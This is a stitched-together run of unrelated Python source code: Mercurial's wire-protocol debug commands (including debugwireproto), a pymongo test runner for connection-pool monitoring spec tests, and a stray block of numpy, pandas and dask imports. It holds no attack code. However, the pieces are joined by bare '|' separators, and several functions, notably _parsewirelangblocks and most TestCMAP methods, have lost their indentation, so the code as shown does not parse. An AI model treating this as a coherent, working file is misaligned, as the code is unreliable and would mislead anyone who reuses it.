    if ui.configbool('ui', 'slash') and pycompat.ossep != '/':
        normalize = util.normpath
    else:
        normalize = lambda fn: fn
    # Column widths are sized to the longest absolute and relative paths.
    widestabs = max(len(p) for p in paths)
    widestrel = max(len(matcher.rel(p)) for p in paths)
    fmt = 'f %%-%ds %%-%ds %%s' % (widestabs, widestrel)
    for p in paths:
        flag = 'exact' if matcher.exact(p) else ''
        ui.write("%s\n" % (fmt % (p, normalize(matcher.rel(p)), flag)).rstrip())
@command('debugwhyunstable', [], _('REV'))
def debugwhyunstable(ui, repo, rev):
    """explain instabilities of a changeset"""
    for entry in obsutil.whyunstable(repo, scmutil.revsingle(repo, rev)):
        divergent = entry.get('divergentnodes')
        # When divergent nodes exist, list them (with phase) before the
        # reason, followed by a trailing space to separate the fields.
        dnodes = ''
        if divergent:
            dnodes = ' '.join('%s (%s)' % (ctx.hex(), ctx.phasestr())
                              for ctx in divergent) + ' '
        ui.write('%s: %s%s %s\n' % (entry['instability'], dnodes,
                                    entry['reason'], entry['node']))
@command('debugwireargs',
    [('', 'three', '', 'three'),
     ('', 'four', '', 'four'),
     ('', 'five', '', 'five'),
    ] + cmdutil.remoteopts,
    _('REPO [OPTIONS]... [ONE [TWO]]'),
    norepo=True)
def debugwireargs(ui, repopath, *vals, **opts):
    # Exercise argument passing over the wire protocol against a peer.
    opts = pycompat.byteskwargs(opts)
    repo = hg.peer(ui, opts, repopath)
    # Drop the generic remote options so only the test options remain.
    for opt in cmdutil.remoteopts:
        del opts[opt[1]]
    args = {}
    # Forward only the options that were actually set.
    for k, v in opts.iteritems():
        if v:
            args[k] = v
    args = pycompat.strkwargs(args)
    # run twice to check that we don't mess up the stream for the next command
    res1 = repo.debugwireargs(*vals, **args)
    res2 = repo.debugwireargs(*vals, **args)
    ui.write("%s\n" % res1)
    # A mismatch means the first call corrupted the protocol stream.
    if res1 != res2:
        ui.warn("%s\n" % res2)
def _parsewirelangblocks(fh):
activeaction = None
blocklines = []
lastindent = 0
for line in fh:
line = line.rstrip()
if not line:
continue
if line.startswith(b'#'):
continue
if not line.startswith(b' '):
# New block. Flush previous one.
if activeaction:
yield activeaction, blocklines
activeaction = line
blocklines = []
lastindent = 0
continue
# Else we start with an indent.
if not activeaction:
raise error.Abort(_('indented line outside of block'))
indent = len(line) - len(line.lstrip())
# If this line is indented more than the last line, concatenate it.
if indent > lastindent and blocklines:
blocklines[-1] += line.lstrip()
else:
blocklines.append(line)
lastindent = indent
# Flush last block.
if activeaction:
yield activeaction, blocklines
@command('debugwireproto',
    [
        ('', 'localssh', False, _('start an SSH server for this repo')),
        ('', 'peer', '', _('construct a specific version of the peer')),
        ('', 'noreadstderr', False, _('do not read from stderr of the remote')),
        ('', 'nologhandshake', False,
         _('do not log I/O related to the peer handshake')),
    ] + cmdutil.remoteopts,
    _('[PATH]'),
    optionalrepo=True)
def debugwireproto(ui, repo, path=None, **opts):
    """send wire protocol commands to a server
    This command can be used to issue wire protocol commands to remote
    peers and to debug the raw data being exchanged.
    ``--localssh`` will start an SSH server against the current repository
    and connect to that. By default, the connection will perform a handshake
    and establish an appropriate peer instance.
    ``--peer`` can be used to bypass the handshake protocol and construct a
    peer instance using the specified class type. Valid values are ``raw``,
    ``http2``, ``ssh1``, and ``ssh2``. ``raw`` instances only allow sending
    raw data payloads and don't support higher-level command actions.
    ``--noreadstderr`` can be used to disable automatic reading from stderr
    of the peer (for SSH connections only). Disabling automatic reading of
    stderr is useful for making output more deterministic.
    Commands are issued via a mini language which is specified via stdin.
    The language consists of individual actions to perform. An action is
    defined by a block. A block is defined as a line with no leading
    space followed by 0 or more lines with leading space. Blocks are
    effectively a high-level command with additional metadata.
    Lines beginning with ``#`` are ignored.
    The following sections denote available actions.
    raw
    ---
    Send raw data to the server.
    The block payload contains the raw data to send as one atomic send
    operation. The data may not actually be delivered in a single system
    call: it depends on the abilities of the transport being used.
    Each line in the block is de-indented and concatenated. Then, that
    value is evaluated as a Python b'' literal. This allows the use of
    backslash escaping, etc.
    raw+
    ----
    Behaves like ``raw`` except flushes output afterwards.
    command <X>
    -----------
    Send a request to run a named command, whose name follows the ``command``
    string.
    Arguments to the command are defined as lines in this block. The format of
    each line is ``<key> <value>``. e.g.::
    command listkeys
    namespace bookmarks
    If the value begins with ``eval:``, it will be interpreted as a Python
    literal expression. Otherwise values are interpreted as Python b'' literals.
    This allows sending complex types and encoding special byte sequences via
    backslash escaping.
    The following arguments have special meaning:
    ``PUSHFILE``
    When defined, the *push* mechanism of the peer will be used instead
    of the static request-response mechanism and the content of the
    file specified in the value of this argument will be sent as the
    command payload.
    This can be used to submit a local bundle file to the remote.
    batchbegin
    ----------
    Instruct the peer to begin a batched send.
    All ``command`` blocks are queued for execution until the next
    ``batchsubmit`` block.
    batchsubmit
    -----------
    Submit previously queued ``command`` blocks as a batch request.
    This action MUST be paired with a ``batchbegin`` action.
    httprequest <method> <path>
    ---------------------------
    (HTTP peer only)
    Send an HTTP request to the peer.
    The HTTP request line follows the ``httprequest`` action. e.g. ``GET /foo``.
    Arguments of the form ``<key>: <value>`` are interpreted as HTTP request
    headers to add to the request. e.g. ``Accept: foo``.
    The following arguments are special:
    ``BODYFILE``
    The content of the file defined as the value to this argument will be
    transferred verbatim as the HTTP request body.
    ``frame <type> <flags> <payload>``
    Send a unified protocol frame as part of the request body.
    All frames will be collected and sent as the body to the HTTP
    request.
    close
    -----
    Close the connection to the server.
    flush
    -----
    Flush data written to the server.
    readavailable
    -------------
    Close the write end of the connection and read all available data from
    the server.
    If the connection to the server encompasses multiple pipes, we poll both
    pipes and read available data.
    readline
    --------
    Read a line of output from the server. If there are multiple output
    pipes, reads only the main pipe.
    ereadline
    ---------
    Like ``readline``, but read from the stderr pipe, if available.
    read <X>
    --------
    ``read()`` N bytes from the server's main output pipe.
    eread <X>
    ---------
    ``read()`` N bytes from the server's stderr pipe, if available.
    Specifying Unified Frame-Based Protocol Frames
    ----------------------------------------------
    It is possible to emit a *Unified Frame-Based Protocol* by using special
    syntax.
    A frame is composed as a type, flags, and payload. These can be parsed
    from a string of the form:
    <request-id> <stream-id> <stream-flags> <type> <flags> <payload>
    ``request-id`` and ``stream-id`` are integers defining the request and
    stream identifiers.
    ``type`` can be an integer value for the frame type or the string name
    of the type. The strings are defined in ``wireprotoframing.py``. e.g.
    ``command-name``.
    ``stream-flags`` and ``flags`` are a ``|`` delimited list of flag
    components. Each component (and there can be just one) can be an integer
    or a flag name for stream flags or frame flags, respectively. Values are
    resolved to integers and then bitwise OR'd together.
    ``payload`` represents the raw frame payload. If it begins with
    ``cbor:``, the following string is evaluated as Python code and the
    resulting object is fed into a CBOR encoder. Otherwise it is interpreted
    as a Python byte string literal.
    """
    opts = pycompat.byteskwargs(opts)
    if opts['localssh'] and not repo:
        raise error.Abort(_('--localssh requires a repository'))
    if opts['peer'] and opts['peer'] not in ('raw', 'http2', 'ssh1', 'ssh2'):
        raise error.Abort(_('invalid value for --peer'),
                          hint=_('valid values are "raw", "ssh1", and "ssh2"'))
    if path and opts['localssh']:
        raise error.Abort(_('cannot specify --localssh with an explicit '
                            'path'))
    if ui.interactive():
        ui.write(_('(waiting for commands on stdin)\n'))
    blocks = list(_parsewirelangblocks(ui.fin))
    proc = None
    stdin = None
    stdout = None
    stderr = None
    opener = None
    if opts['localssh']:
        # We start the SSH server in its own process so there is process
        # separation. This prevents a whole class of potential bugs around
        # shared state from interfering with server operation.
        args = procutil.hgcmd() + [
            '-R', repo.root,
            'debugserve', '--sshstdio',
        ]
        proc = subprocess.Popen(pycompat.rapply(procutil.tonativestr, args),
                                stdin=subprocess.PIPE,
                                stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                                bufsize=0)
        stdin = proc.stdin
        stdout = proc.stdout
        stderr = proc.stderr
        # We turn the pipes into observers so we can log I/O.
        if ui.verbose or opts['peer'] == 'raw':
            stdin = util.makeloggingfileobject(ui, proc.stdin, b'i',
                                               logdata=True)
            stdout = util.makeloggingfileobject(ui, proc.stdout, b'o',
                                                logdata=True)
            stderr = util.makeloggingfileobject(ui, proc.stderr, b'e',
                                                logdata=True)
        # --localssh also implies the peer connection settings.
        url = 'ssh://localserver'
        autoreadstderr = not opts['noreadstderr']
        if opts['peer'] == 'ssh1':
            ui.write(_('creating ssh peer for wire protocol version 1\n'))
            peer = sshpeer.sshv1peer(ui, url, proc, stdin, stdout, stderr,
                                     None, autoreadstderr=autoreadstderr)
        elif opts['peer'] == 'ssh2':
            ui.write(_('creating ssh peer for wire protocol version 2\n'))
            peer = sshpeer.sshv2peer(ui, url, proc, stdin, stdout, stderr,
                                     None, autoreadstderr=autoreadstderr)
        elif opts['peer'] == 'raw':
            ui.write(_('using raw connection to peer\n'))
            peer = None
        else:
            ui.write(_('creating ssh peer from handshake results\n'))
            peer = sshpeer.makepeer(ui, url, proc, stdin, stdout, stderr,
                                    autoreadstderr=autoreadstderr)
    elif path:
        # We bypass hg.peer() so we can proxy the sockets.
        # TODO consider not doing this because we skip
        # ``hg.wirepeersetupfuncs`` and potentially other useful functionality.
        u = util.url(path)
        if u.scheme != 'http':
            raise error.Abort(_('only http:// paths are currently supported'))
        url, authinfo = u.authinfo()
        openerargs = {
            r'useragent': b'Mercurial debugwireproto',
        }
        # Turn pipes/sockets into observers so we can log I/O.
        if ui.verbose:
            openerargs.update({
                r'loggingfh': ui,
                r'loggingname': b's',
                r'loggingopts': {
                    r'logdata': True,
                    r'logdataapis': False,
                },
            })
        if ui.debugflag:
            openerargs[r'loggingopts'][r'logdataapis'] = True
        # Don't send default headers when in raw mode. This allows us to
        # bypass most of the behavior of our URL handling code so we can
        # have near complete control over what's sent on the wire.
        if opts['peer'] == 'raw':
            openerargs[r'sendaccept'] = False
        opener = urlmod.opener(ui, authinfo, **openerargs)
        if opts['peer'] == 'http2':
            ui.write(_('creating http peer for wire protocol version 2\n'))
            # We go through makepeer() because we need an API descriptor for
            # the peer instance to be useful.
            with ui.configoverride({
                ('experimental', 'httppeer.advertise-v2'): True}):
                if opts['nologhandshake']:
                    ui.pushbuffer()
                peer = httppeer.makepeer(ui, path, opener=opener)
                if opts['nologhandshake']:
                    ui.popbuffer()
            if not isinstance(peer, httppeer.httpv2peer):
                raise error.Abort(_('could not instantiate HTTP peer for '
                                    'wire protocol version 2'),
                                  hint=_('the server may not have the feature '
                                         'enabled or is not allowing this '
                                         'client version'))
        elif opts['peer'] == 'raw':
            ui.write(_('using raw connection to peer\n'))
            peer = None
        elif opts['peer']:
            raise error.Abort(_('--peer %s not supported with HTTP peers') %
                              opts['peer'])
        else:
            peer = httppeer.makepeer(ui, path, opener=opener)
        # We /could/ populate stdin/stdout with sock.makefile()...
    else:
        raise error.Abort(_('unsupported connection configuration'))
    batchedcommands = None
    # Now perform actions based on the parsed wire language instructions.
    for action, lines in blocks:
        if action in ('raw', 'raw+'):
            if not stdin:
                raise error.Abort(_('cannot call raw/raw+ on this peer'))
            # Concatenate the data together.
            data = ''.join(l.lstrip() for l in lines)
            data = stringutil.unescapestr(data)
            stdin.write(data)
            if action == 'raw+':
                stdin.flush()
        elif action == 'flush':
            if not stdin:
                raise error.Abort(_('cannot call flush on this peer'))
            stdin.flush()
        elif action.startswith('command'):
            if not peer:
                raise error.Abort(_('cannot send commands unless peer instance '
                                    'is available'))
            command = action.split(' ', 1)[1]
            args = {}
            for line in lines:
                # We need to allow empty values.
                fields = line.lstrip().split(' ', 1)
                if len(fields) == 1:
                    key = fields[0]
                    value = ''
                else:
                    key, value = fields
                if value.startswith('eval:'):
                    value = stringutil.evalpythonliteral(value[5:])
                else:
                    value = stringutil.unescapestr(value)
                args[key] = value
            if batchedcommands is not None:
                batchedcommands.append((command, args))
                continue
            ui.status(_('sending %s command\n') % command)
            if 'PUSHFILE' in args:
                with open(args['PUSHFILE'], r'rb') as fh:
                    del args['PUSHFILE']
                    res, output = peer._callpush(command, fh,
                                                 **pycompat.strkwargs(args))
                    ui.status(_('result: %s\n') % stringutil.escapestr(res))
                    ui.status(_('remote output: %s\n') %
                              stringutil.escapestr(output))
            else:
                with peer.commandexecutor() as e:
                    res = e.callcommand(command, args).result()
                if isinstance(res, wireprotov2peer.commandresponse):
                    val = res.objects()
                    ui.status(_('response: %s\n') %
                              stringutil.pprint(val, bprefix=True, indent=2))
                else:
                    ui.status(_('response: %s\n') %
                              stringutil.pprint(res, bprefix=True, indent=2))
        elif action == 'batchbegin':
            if batchedcommands is not None:
                raise error.Abort(_('nested batchbegin not allowed'))
            batchedcommands = []
        elif action == 'batchsubmit':
            # There is a batching API we could go through. But it would be
            # difficult to normalize requests into function calls. It is easier
            # to bypass this layer and normalize to commands + args.
            ui.status(_('sending batch with %d sub-commands\n') %
                      len(batchedcommands))
            for i, chunk in enumerate(peer._submitbatch(batchedcommands)):
                ui.status(_('response #%d: %s\n') %
                          (i, stringutil.escapestr(chunk)))
            batchedcommands = None
        elif action.startswith('httprequest '):
            if not opener:
                raise error.Abort(_('cannot use httprequest without an HTTP '
                                    'peer'))
            request = action.split(' ', 2)
            if len(request) != 3:
                # Fix: close the quote around the expected format in the
                # error message.
                raise error.Abort(_('invalid httprequest: expected format is '
                                    '"httprequest <method> <path>"'))
            method, httppath = request[1:]
            headers = {}
            body = None
            frames = []
            for line in lines:
                line = line.lstrip()
                m = re.match(b'^([a-zA-Z0-9_-]+): (.*)$', line)
                if m:
                    # Headers need to use native strings.
                    key = pycompat.strurl(m.group(1))
                    value = pycompat.strurl(m.group(2))
                    headers[key] = value
                    continue
                if line.startswith(b'BODYFILE '):
                    # Fix: open() the file *name* after the keyword; the
                    # previous code passed the whole split() list to open().
                    with open(line.split(b' ', 1)[1], 'rb') as fh:
                        body = fh.read()
                elif line.startswith(b'frame '):
                    frame = wireprotoframing.makeframefromhumanstring(
                        line[len(b'frame '):])
                    frames.append(frame)
                else:
                    raise error.Abort(_('unknown argument to httprequest: %s') %
                                      line)
            url = path + httppath
            if frames:
                body = b''.join(bytes(f) for f in frames)
            req = urlmod.urlreq.request(pycompat.strurl(url), body, headers)
            # urllib.Request insists on using has_data() as a proxy for
            # determining the request method. Override that to use our
            # explicitly requested method.
            req.get_method = lambda: pycompat.sysstr(method)
            try:
                res = opener.open(req)
                body = res.read()
            except util.urlerr.urlerror as e:
                # read() method must be called, but only exists in Python 2
                getattr(e, 'read', lambda: None)()
                continue
            ct = res.headers.get(r'Content-Type')
            if ct == r'application/mercurial-cbor':
                ui.write(_('cbor> %s\n') %
                         stringutil.pprint(cborutil.decodeall(body),
                                           bprefix=True,
                                           indent=2))
        elif action == 'close':
            peer.close()
        elif action == 'readavailable':
            if not stdout or not stderr:
                raise error.Abort(_('readavailable not available on this peer'))
            stdin.close()
            stdout.read()
            stderr.read()
        elif action == 'readline':
            if not stdout:
                raise error.Abort(_('readline not available on this peer'))
            stdout.readline()
        elif action == 'ereadline':
            if not stderr:
                raise error.Abort(_('ereadline not available on this peer'))
            stderr.readline()
        elif action.startswith('read '):
            count = int(action.split(' ', 1)[1])
            if not stdout:
                raise error.Abort(_('read not available on this peer'))
            stdout.read(count)
        elif action.startswith('eread '):
            count = int(action.split(' ', 1)[1])
            if not stderr:
                raise error.Abort(_('eread not available on this peer'))
            stderr.read(count)
        else:
            raise error.Abort(_('unknown action: %s') % action)
    if batchedcommands is not None:
        raise error.Abort(_('unclosed "batchbegin" request'))
    if peer:
        peer.close()
    if proc:
        proc.kill()
|
# Copyright 2019-present MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Execute Transactions Spec tests."""
import os
import sys
import threading
import time
sys.path[0:0] = [""]
from test import IntegrationTest, client_knobs, unittest
from test.pymongo_mocks import DummyMonitor
from test.utils import (
CMAPListener,
OvertCommandListener,
TestCreator,
camel_to_snake,
client_context,
get_pool,
get_pools,
rs_or_single_client,
single_client,
single_client_noauth,
wait_until,
)
from test.utils_spec_runner import SpecRunnerThread
from bson.objectid import ObjectId
from bson.son import SON
from pymongo.errors import ConnectionFailure, OperationFailure, PyMongoError
from pymongo.monitoring import (
ConnectionCheckedInEvent,
ConnectionCheckedOutEvent,
ConnectionCheckOutFailedEvent,
ConnectionCheckOutFailedReason,
ConnectionCheckOutStartedEvent,
ConnectionClosedEvent,
ConnectionClosedReason,
ConnectionCreatedEvent,
ConnectionReadyEvent,
PoolClearedEvent,
PoolClosedEvent,
PoolCreatedEvent,
PoolReadyEvent,
)
from pymongo.pool import PoolState, _PoolClosedError
from pymongo.read_preferences import ReadPreference
from pymongo.topology_description import updated_topology_description
# Map of spec-file object type names (the "type" field in the JSON test
# definitions) to the pymongo event/error classes they correspond to.
OBJECT_TYPES = {
    # Event types.
    "ConnectionCheckedIn": ConnectionCheckedInEvent,
    "ConnectionCheckedOut": ConnectionCheckedOutEvent,
    "ConnectionCheckOutFailed": ConnectionCheckOutFailedEvent,
    "ConnectionClosed": ConnectionClosedEvent,
    "ConnectionCreated": ConnectionCreatedEvent,
    "ConnectionReady": ConnectionReadyEvent,
    "ConnectionCheckOutStarted": ConnectionCheckOutStartedEvent,
    "ConnectionPoolCreated": PoolCreatedEvent,
    "ConnectionPoolReady": PoolReadyEvent,
    "ConnectionPoolCleared": PoolClearedEvent,
    "ConnectionPoolClosed": PoolClosedEvent,
    # Error types.
    "PoolClosedError": _PoolClosedError,
    "WaitQueueTimeoutError": ConnectionFailure,
}
class TestCMAP(IntegrationTest):
    """Runner for the CMAP (Connection Monitoring and Pooling) spec tests."""

    # Location of JSON test specifications.
    TEST_PATH = os.path.join(os.path.dirname(os.path.realpath(__file__)), "cmap")
    # Test operations:
def start(self, op):
"""Run the 'start' thread operation."""
target = op["target"]
thread = SpecRunnerThread(target)
thread.start()
self.targets[target] = thread
def wait(self, op):
"""Run the 'wait' operation."""
time.sleep(op["ms"] / 1000.0)
def wait_for_thread(self, op):
"""Run the 'waitForThread' operation."""
target = op["target"]
thread = self.targets[target]
thread.stop()
thread.join()
if thread.exc:
raise thread.exc
self.assertFalse(thread.ops)
def wait_for_event(self, op):
"""Run the 'waitForEvent' operation."""
event = OBJECT_TYPES[op["event"]]
count = op["count"]
timeout = op.get("timeout", 10000) / 1000.0
wait_until(
lambda: self.listener.event_count(event) >= count,
"find %s %s event(s)" % (count, event),
timeout=timeout,
)
def check_out(self, op):
"""Run the 'checkOut' operation."""
label = op["label"]
with self.pool.get_socket() as sock_info:
# Call 'pin_cursor' so we can hold the socket.
sock_info.pin_cursor()
if label:
self.labels[label] = sock_info
else:
self.addCleanup(sock_info.close_socket, None)
def check_in(self, op):
"""Run the 'checkIn' operation."""
label = op["connection"]
sock_info = self.labels[label]
self.pool.return_socket(sock_info)
def ready(self, op):
"""Run the 'ready' operation."""
self.pool.ready()
def clear(self, op):
"""Run the 'clear' operation."""
self.pool.reset()
def close(self, op):
"""Run the 'close' operation."""
self.pool.close()
def run_operation(self, op):
"""Run a single operation in a test."""
op_name = camel_to_snake(op["name"])
thread = op["thread"]
meth = getattr(self, op_name)
if thread:
self.targets[thread].schedule(lambda: meth(op))
else:
meth(op)
def run_operations(self, ops):
"""Run a test's operations."""
for op in ops:
self._ops.append(op)
self.run_operation(op)
def check_object(self, actual, expected):
"""Assert that the actual object matches the expected object."""
self.assertEqual(type(actual), OBJECT_TYPES[expected["type"]])
for attr, expected_val in expected.items():
if attr == "type":
continue
c2s = camel_to_snake(attr)
actual_val = getattr(actual, c2s)
if expected_val == 42:
self.assertIsNotNone(actual_val)
else:
self.assertEqual(actual_val, expected_val)
def check_event(self, actual, expected):
"""Assert that the actual event matches the expected event."""
self.check_object(actual, expected)
def actual_events(self, ignore):
"""Return all the non-ignored events."""
ignore = tuple(OBJECT_TYPES[name] for name in ignore)
return [event for event in self.listener.events if not isinstance(event, ignore)]
def check_events(self, events, ignore):
"""Check the events of a test."""
actual_events = self.actual_events(ignore)
for actual, expected in zip(actual_events, events):
self.logs.append("Checking event actual: %r vs expected: %r" % (actual, expected))
self.check_event(actual, expected)
if len(events) > len(actual_events):
self.fail("missing events: %r" % (events[len(actual_events) :],))
def check_error(self, actual, expected):
message = expected.pop("message")
self.check_object(actual, expected)
self.assertIn(message, str(actual))
def _set_fail_point(self, client, command_args):
cmd = SON([("configureFailPoint", "failCommand")])
cmd.update(command_args)
client.admin.command(cmd)
def set_fail_point(self, command_args):
    """Set the fail point on self.client, skipping when unsupported."""
    if not client_context.supports_failCommand_fail_point:
        self.skipTest("failCommand fail point must be supported")
    self._set_fail_point(self.client, command_args)
def run_scenario(self, scenario_def, test):
    """Run a CMAP spec test: set up listener/client/pool, run the
    operations, then compare emitted events against expectations."""
    self.logs: list = []
    self.assertEqual(scenario_def["version"], 1)
    self.assertIn(scenario_def["style"], ["unit", "integration"])
    self.listener = CMAPListener()
    self._ops: list = []
    # Configure the fail point before creating the client.
    if "failPoint" in test:
        fp = test["failPoint"]
        self.set_fail_point(fp)
        self.addCleanup(
            self.set_fail_point, {"configureFailPoint": fp["configureFailPoint"], "mode": "off"}
        )
    opts = test["poolOptions"].copy()
    opts["event_listeners"] = [self.listener]
    opts["_monitor_class"] = DummyMonitor
    opts["connect"] = False
    # Support backgroundThreadIntervalMS, default to 50ms.
    interval = opts.pop("backgroundThreadIntervalMS", 50)
    if interval < 0:
        # Negative interval means "never run the background task".
        kill_cursor_frequency = 99999999
    else:
        kill_cursor_frequency = interval / 1000.0
    with client_knobs(kill_cursor_frequency=kill_cursor_frequency, min_heartbeat_interval=0.05):
        client = single_client(**opts)
        # Update the SD to a known type because the DummyMonitor will not.
        # Note we cannot simply call topology.on_change because that would
        # internally call pool.ready() which introduces unexpected
        # PoolReadyEvents. Instead, update the initial state before
        # opening the Topology.
        td = client_context.client._topology.description
        sd = td.server_descriptions()[(client_context.host, client_context.port)]
        client._topology._description = updated_topology_description(
            client._topology._description, sd
        )
        # When backgroundThreadIntervalMS is negative we do not start the
        # background thread to ensure it never runs.
        if interval < 0:
            client._topology.open()
        else:
            client._get_topology()
    self.addCleanup(client.close)
    self.pool = list(client._topology._servers.values())[0].pool
    # Map of target names to Thread objects.
    self.targets: dict = dict()
    # Map of label names to Connection objects
    self.labels: dict = dict()

    def cleanup():
        # Stop all spawned threads, then close any checked-out connections.
        for t in self.targets.values():
            t.stop()
        for t in self.targets.values():
            t.join(5)
        for conn in self.labels.values():
            conn.close_socket(None)

    self.addCleanup(cleanup)
    try:
        if test["error"]:
            with self.assertRaises(PyMongoError) as ctx:
                self.run_operations(test["operations"])
            self.check_error(ctx.exception, test["error"])
        else:
            self.run_operations(test["operations"])
        self.check_events(test["events"], test["ignore"])
    except Exception:
        # Print the events after a test failure.
        print("\nFailed test: %r" % (test["description"],))
        print("Operations:")
        for op in self._ops:
            print(op)
        print("Threads:")
        print(self.targets)
        print("Connections:")
        print(self.labels)
        print("Events:")
        for event in self.listener.events:
            print(event)
        print("Log:")
        for log in self.logs:
            print(log)
        raise
# Pool options used by the prose tests below; every value is non-default so
# the tests can assert against PoolOptions.non_default_options.
POOL_OPTIONS = {
    "maxPoolSize": 50,
    "minPoolSize": 1,
    "maxIdleTimeMS": 10000,
    "waitQueueTimeoutMS": 10000,
}
#
# Prose tests. Numbers correspond to the prose test number in the spec.
#
def test_1_client_connection_pool_options(self):
    """Prose test 1: keyword pool options are applied to the client's pool."""
    client = rs_or_single_client(**self.POOL_OPTIONS)
    self.addCleanup(client.close)
    pool_opts = get_pool(client).opts
    self.assertEqual(pool_opts.non_default_options, self.POOL_OPTIONS)
def test_2_all_client_pools_have_same_options(self):
    """Prose test 2: every discovered server's pool shares the same options."""
    client = rs_or_single_client(**self.POOL_OPTIONS)
    self.addCleanup(client.close)
    client.admin.command("ping")
    # Discover at least one secondary.
    if client_context.has_secondaries:
        client.admin.command("ping", read_preference=ReadPreference.SECONDARY)
    pools = get_pools(client)
    pool_opts = pools[0].opts
    self.assertEqual(pool_opts.non_default_options, self.POOL_OPTIONS)
    for pool in pools[1:]:
        self.assertEqual(pool.opts, pool_opts)
def test_3_uri_connection_pool_options(self):
    """Prose test 3: pool options supplied via the connection URI are applied."""
    query = "&".join("%s=%s" % (key, value) for key, value in self.POOL_OPTIONS.items())
    uri = "mongodb://{}/?{}".format(client_context.pair, query)
    client = rs_or_single_client(uri)
    self.addCleanup(client.close)
    self.assertEqual(get_pool(client).opts.non_default_options, self.POOL_OPTIONS)
def test_4_subscribe_to_events(self):
    """Prose test 4: CMAP events are delivered to a subscribed listener."""
    listener = CMAPListener()
    client = single_client(event_listeners=[listener])
    self.addCleanup(client.close)
    count = listener.event_count
    self.assertEqual(count(PoolCreatedEvent), 1)
    # First ping creates, readies, checks out and checks in a new connection.
    client.admin.command("ping")
    for event_type in (
        ConnectionCheckOutStartedEvent,
        ConnectionCreatedEvent,
        ConnectionReadyEvent,
        ConnectionCheckedOutEvent,
        ConnectionCheckedInEvent,
    ):
        self.assertEqual(count(event_type), 1)
    # Second ping reuses the pooled connection: no new create/ready events.
    client.admin.command("ping")
    for event_type in (
        ConnectionCheckOutStartedEvent,
        ConnectionCheckedOutEvent,
        ConnectionCheckedInEvent,
    ):
        self.assertEqual(count(event_type), 2)
    # Closing the client clears the pool and closes its connection.
    client.close()
    self.assertEqual(count(PoolClearedEvent), 1)
    self.assertEqual(count(ConnectionClosedEvent), 1)
def test_5_check_out_fails_connection_error(self):
    """Prose test 5: a connect failure emits CheckOutFailed(CONN_ERROR)
    followed by a PoolClearedEvent."""
    listener = CMAPListener()
    client = single_client(event_listeners=[listener])
    self.addCleanup(client.close)
    pool = get_pool(client)

    def mock_connect(*args, **kwargs):
        # Simulate a network failure while establishing a connection.
        raise ConnectionFailure("connect failed")

    pool.connect = mock_connect
    # Un-patch Pool.connect to break the cyclic reference.
    self.addCleanup(delattr, pool, "connect")
    # Attempt to create a new connection.
    with self.assertRaisesRegex(ConnectionFailure, "connect failed"):
        client.admin.command("ping")
    self.assertIsInstance(listener.events[0], PoolCreatedEvent)
    self.assertIsInstance(listener.events[1], PoolReadyEvent)
    self.assertIsInstance(listener.events[2], ConnectionCheckOutStartedEvent)
    self.assertIsInstance(listener.events[3], ConnectionCheckOutFailedEvent)
    self.assertIsInstance(listener.events[4], PoolClearedEvent)
    failed_event = listener.events[3]
    self.assertEqual(failed_event.reason, ConnectionCheckOutFailedReason.CONN_ERROR)
def test_5_check_out_fails_auth_error(self):
    """Prose test 5 (auth variant): an auth failure closes the new
    connection and reports CheckOutFailed(CONN_ERROR)."""
    listener = CMAPListener()
    client = single_client_noauth(
        username="notauser", password="fail", event_listeners=[listener]
    )
    self.addCleanup(client.close)
    # Attempt to create a new connection.
    with self.assertRaisesRegex(OperationFailure, "failed"):
        client.admin.command("ping")
    self.assertIsInstance(listener.events[0], PoolCreatedEvent)
    self.assertIsInstance(listener.events[1], PoolReadyEvent)
    self.assertIsInstance(listener.events[2], ConnectionCheckOutStartedEvent)
    self.assertIsInstance(listener.events[3], ConnectionCreatedEvent)
    # Error happens here.
    self.assertIsInstance(listener.events[4], ConnectionClosedEvent)
    self.assertIsInstance(listener.events[5], ConnectionCheckOutFailedEvent)
    self.assertEqual(listener.events[5].reason, ConnectionCheckOutFailedReason.CONN_ERROR)
#
# Extra non-spec tests
#
def assertRepr(self, obj):
    """Assert that eval(repr(obj)) round-trips to an equivalent object."""
    new_obj = eval(repr(obj))
    self.assertEqual(type(new_obj), type(obj))
    self.assertEqual(repr(new_obj), repr(obj))
def test_events_repr(self):
    """Every CMAP event type has an eval()-able repr (see assertRepr)."""
    host = ("localhost", 27017)
    self.assertRepr(ConnectionCheckedInEvent(host, 1))
    self.assertRepr(ConnectionCheckedOutEvent(host, 1))
    self.assertRepr(
        ConnectionCheckOutFailedEvent(host, ConnectionCheckOutFailedReason.POOL_CLOSED)
    )
    self.assertRepr(ConnectionClosedEvent(host, 1, ConnectionClosedReason.POOL_CLOSED))
    self.assertRepr(ConnectionCreatedEvent(host, 1))
    self.assertRepr(ConnectionReadyEvent(host, 1))
    self.assertRepr(ConnectionCheckOutStartedEvent(host))
    self.assertRepr(PoolCreatedEvent(host, {}))
    self.assertRepr(PoolClearedEvent(host))
    self.assertRepr(PoolClearedEvent(host, service_id=ObjectId()))
    self.assertRepr(PoolClosedEvent(host))
def test_close_leaves_pool_unpaused(self):
    """After client.close() the pool is cleared but stays READY so it can
    still serve checkouts."""
    # Needed until we implement PYTHON-2463. This test is related to
    # test_threads.TestThreads.test_client_disconnect
    listener = CMAPListener()
    client = single_client(event_listeners=[listener])
    client.admin.command("ping")
    pool = get_pool(client)
    client.close()
    self.assertEqual(1, listener.event_count(PoolClearedEvent))
    self.assertEqual(PoolState.READY, pool.state)
    # Checking out a connection should succeed
    with pool.get_socket():
        pass
def create_test(scenario_def, test, name):
    """Build a test method that runs one CMAP scenario.

    ``name`` is accepted for TestCreator compatibility but is unused here.
    """

    def run_scenario(self):
        return self.run_scenario(scenario_def, test)

    return run_scenario
class CMAPTestCreator(TestCreator):
    def tests(self, scenario_def):
        """Extract the tests from a spec file.

        CMAP tests do not have a 'tests' field. The whole file represents
        a single test case.
        """
        return [scenario_def]
# Generate the spec tests: each CMAP JSON file under TEST_PATH becomes one
# test method on TestCMAP.
test_creator = CMAPTestCreator(create_test, TestCMAP, TestCMAP.TEST_PATH)
test_creator.create_tests()

if __name__ == "__main__":
    unittest.main()
|
from functools import partial
from typing import Union
import numpy as np
import pandas as pd
from dask import dataframe as dd
